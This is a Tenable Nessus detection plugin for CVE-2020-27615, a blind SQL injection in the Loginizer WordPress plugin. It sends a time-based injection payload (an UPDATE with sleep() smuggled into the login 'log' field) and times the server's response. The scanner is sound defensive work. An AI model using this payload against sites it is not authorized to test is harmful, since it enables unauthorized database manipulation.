The Loginizer Plugin for WordPress running on the remote web server is affected by a SQL injection vulnerability due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this issue to inject or manipulate SQL queries in the back-end database, resulting in the manipulation of arbitrary data.
#
# (C) Tenable Network Security, Inc.
#
include('compat.inc');
if (description)
{
script_id(141810);
script_version("1.4");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/12/05");
script_cve_id("CVE-2020-27615");
script_xref(name:"CEA-ID", value:"CEA-2020-0130");
script_name(english:"WordPress Loginizer plugin < 1.6.4 blind SQLi (CVE-2020-27615)");
script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a PHP script that is affected by a remote SQL injection vulnerability.");
script_set_attribute(attribute:"description", value:
"The Loginizer Plugin for WordPress running on the remote web server is affected by a SQL injection vulnerability
due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this issue to
inject or manipulate SQL queries in the back-end database, resulting in the manipulation of arbitrary data.");
script_set_attribute(attribute:"see_also", value:"https://wpdeeply.com/loginizer-before-1-6-4-sqli-injection/");
script_set_attribute(attribute:"see_also", value:"https://loginizer.com/blog/loginizer-1-6-4-security-fix/");
script_set_attribute(attribute:"solution", value:
"Upgrade the Loginizer Plugin for WordPress to version 1.6.4 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-27615");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2020/10/21");
script_set_attribute(attribute:"patch_publication_date", value:"2020/10/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2020/10/22");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("wordpress_detect.nasl");
script_require_keys("installed_sw/WordPress", "www/PHP");
script_require_ports("Services/www", 80);
exit(0);
}
include('http.inc');
include('url_func.inc');
include('webapp_func.inc');
app = 'WordPress';
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:80, php:TRUE);
install = get_single_install(app_name:app, port:port);
dir = install['path'];
install_url = build_url(port:port, qs:dir);
plugin = 'Loginizer';
plugin_dir = '/wp-content/plugins/loginizer/';
plugin_url = build_url(port:port, qs:dir + plugin_dir);
installed = get_kb_item('www/'+port+'/webapp_ext/'+plugin+' under '+dir);
if (!installed)
{
checks = make_array();
checks[plugin_dir + 'readme.txt'][0] = make_list('=== Loginizer ===');
installed = check_webapp_ext(
checks : checks,
dir : dir,
port : port,
ext : plugin
);
}
if (!installed) audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + ' plugin');
# then we attempt to exploit it
stimes = make_list(15, 15);
num_queries = max_index(stimes);
vuln = FALSE;
url = '/wp-login.php';
postdata = 'log=nessus&pwd=1229132295&wp-submit=Log+In&redirect_to=&testcookie=1';
http_send_recv3(
method : 'POST',
port : port,
item : dir + url,
data : postdata,
content_type : 'application/x-www-form-urlencoded',
exit_on_fail : TRUE
);
for (i = 0; i < max_index(stimes); i++)
{
http_set_read_timeout(stimes[i] + 10);
then = unixtime();
postdata = 'log=nessus%27%2C+lockout%3Dlockout%2Bsleep%28' + stimes[i] + '%29+WHERE+username%3D%27nessus%27+LIMIT+1%3B%23&pwd=1229132295&wp-submit=Log+In&testcookie=1';
res = http_send_recv3(
method : 'POST',
port : port,
item : dir + url,
data : postdata,
content_type : 'application/x-www-form-urlencoded',
exit_on_fail : TRUE
);
now = unixtime();
ttime = now - then;
query = 'SLEEP(' +stimes[i]+ ');';
time_per_query += 'Query #' + (i+1) + ' : ' + query + ' Sleep Time : ' +
stimes[i] + ' secs Response Time : ' + ttime + ' secs\n';
overalltime += ttime;
if ( (ttime >= stimes[i]) && (ttime <= (stimes[i] + 15)) )
{
vuln = TRUE;
output =
'Blind SQL Injection Results' +
'\n Query : ' + query +
'\n Response time : ' + ttime + ' secs' +
'\n Number of queries executed : ' + num_queries +
'\n Total test time : ' + overalltime + ' secs' +
'\n Time per query : ' +
'\n'+ ' ' + time_per_query;
continue;
}
else
vuln = FALSE;
}
if (!vuln)
audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, plugin_url, plugin + ' plugin');
security_report_v4(
port : port,
severity : SECURITY_HOLE,
generic : TRUE,
sqli : TRUE,
request : make_list(http_last_sent_request()),
output : output
);